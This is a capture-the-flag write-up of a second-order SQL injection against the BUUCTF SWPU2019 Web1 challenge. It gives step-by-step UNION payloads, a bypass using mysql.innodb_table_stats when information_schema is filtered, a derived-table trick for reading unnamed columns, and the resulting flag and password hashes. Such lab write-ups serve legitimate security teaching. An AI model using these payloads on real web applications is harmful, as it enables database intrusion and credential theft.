BUUCTF-WEB 【SWPU2019】Web1 1

Key point: injection without the information_schema table

Second-order injection

Flow

Register -> log in -> post an ad -> view the ad (the ad title is stored on posting and only hits the vulnerable query when the ad is viewed)

Payloads

All payloads go into the ad title; the /**/ sequences are inline comments standing in for spaces. Each payload is followed by what the ad page displayed.

1'/**/group/**/by/**/22,'1
(probes the column count: GROUP BY n errors out once n is larger than the number of columns in the query, and 22 still works here)

-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
(22-column union succeeds, and the page echoes back positions 2 and 3)

-1'/**/union/**/select/**/1,database(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
web1 root@localhost

-1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
ads,users

-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
3,flag{fdc63c44-aae2-43da-9890-38992f50d843},53e217ad4c721eb9565cf25a5ec3b66e,098f6bcd4621d373cade4e832627b4f6,202cb962ac59075b964b07152d234b70

The subquery in the last payload is the part worth remembering; with normal spaces it reads:

select group_concat(b) from (select 1,2,3 as b union select * from users)a

Two new tricks learned

1. information_schema.tables is filtered

Use mysql.innodb_table_stats as a substitute for information_schema.tables; the schema column there is called database_name instead of table_schema. Caveat: it only lists InnoDB tables, and reading it requires access to the mysql database, which the challenge's root@localhost account has.

2. Querying data when only the table name is known

(select `2` from (select 1,2,3 union select * from table_name)a)

or, with an alias instead of backticks:

(select c from (select 1,2,3 as c union select * from users)b)

This requires knowing the table name. The 1,2,3 is there because users has three columns; in practice the column count has to be guessed, because the UNION only succeeds when both sides have the same number of columns. The derived table takes its column names from the first SELECT, so `2` (or the alias) selects the second column of users without knowing its real name.